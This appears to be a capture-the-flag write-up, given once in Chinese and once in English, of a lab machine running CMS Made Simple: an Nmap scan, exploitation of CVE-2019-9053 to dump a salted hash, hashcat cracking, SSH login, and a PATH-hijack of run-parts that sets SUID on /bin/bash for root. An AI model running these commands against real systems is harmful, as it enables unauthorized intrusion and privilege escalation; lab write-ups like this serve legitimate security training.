本文介绍了如何在Linux环境中利用CVE-2019-9053漏洞进行渗透测试。首先,通过Nmap扫描获取目标主机的信息,包括开放的SSH和HTTP端口。接着,通过访问Web界面和robots.txt文件发现了使用的CMS。利用漏洞获取用户凭据后,成功通过SSH登录。随后,通过检查权限,发现可以利用路径劫持进行特权升级,最终获得root权限。最后,总结了在此过程中学到的经验教训。 This article introduces how to exploit the CVE-2019-9053 vulnerability for penetration testing in a Linux environment. First, Nmap scanning is used to obtain information about the target host, including open SSH and HTTP ports. Next, by accessing the web interface and the robots.txt file, the CMS in use is discovered. After exploiting the vulnerability to obtain user credentials, SSH login is successful. Subsequently, by checking permissions, it is found that path hijacking can be used for privilege escalation, ultimately gaining root privileges. Finally, the lessons learned during this process are summarized.

Information Gathering

# Nmap 7.98 scan initiated Mon Dec 29 13:52:07 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.379 days (since Wed Dec 24 04:47:57 2025)
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 29 13:53:46 2025 -- 1 IP address (1 host up) scanned in 99.57 seconds

Vulnerability Analysis

访问web得到,随后查看robots.txt最后进入http://writeup.htb/writeup/发现使用的是CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.搜索CMS Made Simple 2019得到CVE-2019-9053

Exploitation (User Flag)

运行后得到

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
➜  Writeup echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
->raykayjay9

ssh jkr@writeup.htb输入raykayjay9即可

Privilege Escalation (Root Flag)

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

staff组,代表对/usr/local 有所有权限

jkr@writeup:~$ ls -ld /usr/local/bin
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin

运行pspy

# 刚开始我没什么发现,但是当我们ssh到目标是可以看到
2025/12/31 01:34:45 CMD: UID=0     PID=2265   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2025/12/31 01:34:45 CMD: UID=0     PID=2266   | run-parts --lsbsysinit /etc/update-motd.d

从PATH中寻找run-parts运行,所以可以路径劫持

jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

现在重新连接目标,触发我们的payload

➜  Writeup ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15  2017 /bin/bash
-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) euid=0(root) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

Lessons Learned

Information Gathering

# Nmap 7.98 scan initiated Mon Dec 29 13:52:07 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.379 days (since Wed Dec 24 04:47:57 2025)
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 29 13:53:46 2025 -- 1 IP address (1 host up) scanned in 99.57 seconds

Vulnerability Analysis

By accessing the web, then checking robots.txt, and finally entering http://writeup.htb/writeup/, it was found that it uses CMS Made Simple - Copyright (C) 2004-2019. All rights reserved. Searching for CMS Made Simple 2019 yields CVE-2019-9053.

Exploitation (User Flag)

After running, we get:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
➜  Writeup echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
->raykayjay9

For ssh jkr@writeup.htb, enter raykayjay9.

Privilege Escalation (Root Flag)

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

The staff group represents having full permissions on /usr/local.

jkr@writeup:~$ ls -ld /usr/local/bin
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin

Running pspy.

# Initially, I didn't find anything, but when we ssh to the target, we can see
2025/12/31 01:34:45 CMD: UID=0     PID=2265   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2025/12/31 01:34:45 CMD: UID=0     PID=2266   | run-parts --lsbsysinit /etc/update-motd.d

Looking for run-parts in the PATH, so path hijacking is possible.

jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

Now reconnect to the target to trigger our payload.

➜  Writeup ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15  2017 /bin/bash
-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) euid=0(root) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

Lessons Learned